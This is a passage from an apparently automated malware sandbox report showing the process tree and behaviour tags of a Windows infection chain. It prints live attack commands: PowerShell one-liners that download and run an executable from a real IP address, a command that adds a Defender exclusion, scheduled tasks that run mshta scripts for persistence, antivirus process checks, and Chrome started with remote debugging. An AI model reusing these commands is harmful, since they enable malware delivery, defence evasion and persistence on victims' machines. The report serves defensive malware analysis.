memory of 1892 1656 cmd.exe 41 PID 1656 wrote to memory of 1892 1656 cmd.exe 41 PID 1656 wrote to memory of 852 1656 cmd.exe 42 PID 1656 wrote to memory of 852 1656 cmd.exe 42 PID 1656 wrote to memory of 852 1656 cmd.exe 42 PID 1656 wrote to memory of 852 1656 cmd.exe 42 PID 1656 wrote to memory of 1212 1656 cmd.exe 43 PID 1656 wrote to memory of 1212 1656 cmd.exe 43 PID 1656 wrote to memory of 1212 1656 cmd.exe 43 PID 1656 wrote to memory of 1212 1656 cmd.exe 43 PID 1656 wrote to memory of 940 1656 cmd.exe 45 PID 1656 wrote to memory of 940 1656 cmd.exe 45 PID 1656 wrote to memory of 940 1656 cmd.exe 45 PID 1656 wrote to memory of 940 1656 cmd.exe 45 PID 1656 wrote to memory of 1668 1656 cmd.exe 46 PID 1656 wrote to memory of 1668 1656 cmd.exe 46 PID 1656 wrote to memory of 1668 1656 cmd.exe 46 PID 1656 wrote to memory of 1668 1656 cmd.exe 46 PID 1656 wrote to memory of 2532 1656 cmd.exe 47 PID 1656 wrote to memory of 2532 1656 cmd.exe 47 PID 1656 wrote to memory of 2532 1656 cmd.exe 47 PID 1656 wrote to memory of 2532 1656 cmd.exe 47 PID 1656 wrote to memory of 2820 1656 cmd.exe 48 PID 1656 wrote to memory of 2820 1656 cmd.exe 48 PID 1656 wrote to memory of 2820 1656 cmd.exe 48 PID 1656 wrote to memory of 2820 1656 cmd.exe 48 PID 1656 wrote to memory of 1628 1656 cmd.exe 49 PID 1656 wrote to memory of 1628 1656 cmd.exe 49 PID 1656 wrote to memory of 1628 1656 cmd.exe 49 PID 1656 wrote to memory of 1628 1656 cmd.exe 49 PID 1656 wrote to memory of 2016 1656 cmd.exe 50 PID 1656 wrote to memory of 2016 1656 cmd.exe 50 PID 1656 wrote to memory of 2016 1656 cmd.exe 50 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1140
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Users\Admin\AppData\Local\Temp\10111840101\HmngBpR.exe"C:\Users\Admin\AppData\Local\Temp\10111840101\HmngBpR.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Users\Admin\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeC:\Users\Admin\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Users\Admin\AppData\Roaming\Dockerprotectysd\SplashWin.exeC:\Users\Admin\AppData\Roaming\Dockerprotectysd\SplashWin.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2912 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe8⤵
- System Location Discovery: System Language Discovery
PID:1884 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1884 -s 2569⤵
- Program crash
PID:2744
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10112790101\ADFoyxP.exe"C:\Users\Admin\AppData\Local\Temp\10112790101\ADFoyxP.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\SysWOW64\expand.exeexpand Go.pub Go.pub.bat6⤵
- System Location Discovery: System Language Discovery
PID:1892
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:852
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"6⤵
- System Location Discovery: System Language Discovery
PID:1212
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:940
-
-
C:\Windows\SysWOW64\findstr.exefindstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"6⤵
- System Location Discovery: System Language Discovery
PID:1668
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 3530906⤵
- System Location Discovery: System Language Discovery
PID:2532
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Really.pub6⤵
- System Location Discovery: System Language Discovery
PID:2820
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "posted" Good6⤵
- System Location Discovery: System Language Discovery
PID:1628
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com6⤵
- System Location Discovery: System Language Discovery
PID:2016
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m6⤵
- System Location Discovery: System Language Discovery
PID:1996
-
-
C:\Users\Admin\AppData\Local\Temp\353090\Seat.comSeat.com m6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:340 -
C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe7⤵PID:2700
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 56⤵
- System Location Discovery: System Language Discovery
PID:1596
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10114440101\9hUDDVk.exe"C:\Users\Admin\AppData\Local\Temp\10114440101\9hUDDVk.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2784 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2784 -s 8485⤵
- Loads dropped DLL
- Program crash
PID:5052
-
-
-
C:\Users\Admin\AppData\Local\Temp\10114630101\pwHxMTy.exe"C:\Users\Admin\AppData\Local\Temp\10114630101\pwHxMTy.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:560 -
C:\Users\Admin\AppData\Local\Temp\10114630101\pwHxMTy.exe"C:\Users\Admin\AppData\Local\Temp\10114630101\pwHxMTy.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2224
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 560 -s 5005⤵
- Loads dropped DLL
- Program crash
PID:1196
-
-
-
C:\Users\Admin\AppData\Local\Temp\10115790101\T0QdO0l.exe"C:\Users\Admin\AppData\Local\Temp\10115790101\T0QdO0l.exe"4⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1312 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1312 -s 6445⤵
- Loads dropped DLL
- Program crash
PID:2772
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10119590141\ogfNbjS.ps1"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5092
-
-
C:\Users\Admin\AppData\Local\Temp\10121660101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10121660101\amnew.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:3136 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"5⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:3552 -
C:\Users\Admin\AppData\Local\Temp\10019520101\pered.exe"C:\Users\Admin\AppData\Local\Temp\10019520101\pered.exe"6⤵
- Executes dropped EXE
PID:4024
-
-
C:\Users\Admin\AppData\Local\Temp\10019730101\23a2f3c287.exe"C:\Users\Admin\AppData\Local\Temp\10019730101\23a2f3c287.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4628 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- Loads dropped DLL
PID:3696
-
-
-
C:\Users\Admin\AppData\Local\Temp\10019740101\571017d6c6.exe"C:\Users\Admin\AppData\Local\Temp\10019740101\571017d6c6.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2444 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4332
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10122730101\bncn6rv.exe"C:\Users\Admin\AppData\Local\Temp\10122730101\bncn6rv.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2480 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3192 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6d19758,0x7fef6d19768,0x7fef6d197786⤵PID:3204
-
-
C:\Windows\system32\ctfmon.exectfmon.exe6⤵PID:3356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1360,i,1023435463342309179,4125258361855218430,131072 /prefetch:26⤵PID:3428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1360,i,1023435463342309179,4125258361855218430,131072 /prefetch:86⤵PID:3464
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1576 --field-trial-handle=1360,i,1023435463342309179,4125258361855218430,131072 /prefetch:86⤵PID:3480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2120 --field-trial-handle=1360,i,1023435463342309179,4125258361855218430,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:3700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2452 --field-trial-handle=1360,i,1023435463342309179,4125258361855218430,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:3860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2548 --field-trial-handle=1360,i,1023435463342309179,4125258361855218430,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:3872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1368 --field-trial-handle=1360,i,1023435463342309179,4125258361855218430,131072 /prefetch:26⤵PID:4188
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""5⤵
- Uses browser remote debugging
- Enumerates system info in registry
PID:3328 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6d19758,0x7fef6d19768,0x7fef6d197786⤵PID:3592
-
-
C:\Windows\system32\ctfmon.exectfmon.exe6⤵PID:4288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1104 --field-trial-handle=1304,i,3371220024757351992,7703930578793246750,131072 /prefetch:26⤵PID:2332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1440 --field-trial-handle=1304,i,3371220024757351992,7703930578793246750,131072 /prefetch:86⤵PID:4668
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10123540101\packed.exe"C:\Users\Admin\AppData\Local\Temp\10123540101\packed.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Enumerates system info in registry
PID:4888 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3184
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "COM Surrogate Task" /tr "C:\Program Files\runtime\COM Surrogate.exe" /sc onlogon /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:4012
-
-
C:\Program Files\runtime\COM Surrogate.exe"C:\Program Files\runtime\COM Surrogate.exe"5⤵
- Executes dropped EXE
PID:4072
-
-
-
C:\Users\Admin\AppData\Local\Temp\10123850101\PQkVDtx.exe"C:\Users\Admin\AppData\Local\Temp\10123850101\PQkVDtx.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Enumerates system info in registry
PID:5068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5004
-
-
C:\Program Files\runtime\COM Surrogate.exe"C:\Program Files\runtime\COM Surrogate.exe"5⤵
- Executes dropped EXE
PID:3156
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10124111121\skf7iF4.cmd"4⤵
- System Location Discovery: System Language Discovery
PID:3920 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\10124111121\skf7iF4.cmd' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3956 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10124111121\skf7iF4.cmd" sgcCUaUFtA6⤵
- System Location Discovery: System Language Discovery
PID:4108 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704 -
C:\Windows\SysWOW64\findstr.exe"C:\Windows\system32\findstr.exe" /i WDS100T2B0A8⤵
- System Location Discovery: System Language Discovery
PID:4568
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10124820101\yUI6F6C.exe"C:\Users\Admin\AppData\Local\Temp\10124820101\yUI6F6C.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3312 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3312 -s 11885⤵
- Loads dropped DLL
- Program crash
PID:5000
-
-
-
C:\Users\Admin\AppData\Local\Temp\10124840101\CgmaT61.exe"C:\Users\Admin\AppData\Local\Temp\10124840101\CgmaT61.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2372 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 5005⤵
- Program crash
PID:4824
-
-
-
C:\Users\Admin\AppData\Local\Temp\10125770101\35f0ddbec0.exe"C:\Users\Admin\AppData\Local\Temp\10125770101\35f0ddbec0.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1992 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn ARkQImaMoA4 /tr "mshta C:\Users\Admin\AppData\Local\Temp\4M1Fx0D1I.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
PID:2460 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn ARkQImaMoA4 /tr "mshta C:\Users\Admin\AppData\Local\Temp\4M1Fx0D1I.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:2388
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\4M1Fx0D1I.hta5⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1520 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DHIF15WKYSZZZNVDPVNIJ3QHRQPBW9FQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2532 -
C:\Users\Admin\AppData\Local\TempDHIF15WKYSZZZNVDPVNIJ3QHRQPBW9FQ.EXE"C:\Users\Admin\AppData\Local\TempDHIF15WKYSZZZNVDPVNIJ3QHRQPBW9FQ.EXE"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:380
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10125780121\am_no.cmd" "4⤵PID:772
-
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2704
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:2920 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:3272 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:2152 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "Fvk7BmaO4zH" /tr "mshta \"C:\Temp\qudfFsN74.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2260
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\qudfFsN74.hta"5⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:3676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3184 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4208
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10125900101\GjThRAJ.exe"C:\Users\Admin\AppData\Local\Temp\10125900101\GjThRAJ.exe"4⤵
- Executes dropped EXE
PID:4536
-
-
C:\Users\Admin\AppData\Local\Temp\10126060101\a7235313d4.exe"C:\Users\Admin\AppData\Local\Temp\10126060101\a7235313d4.exe"4⤵
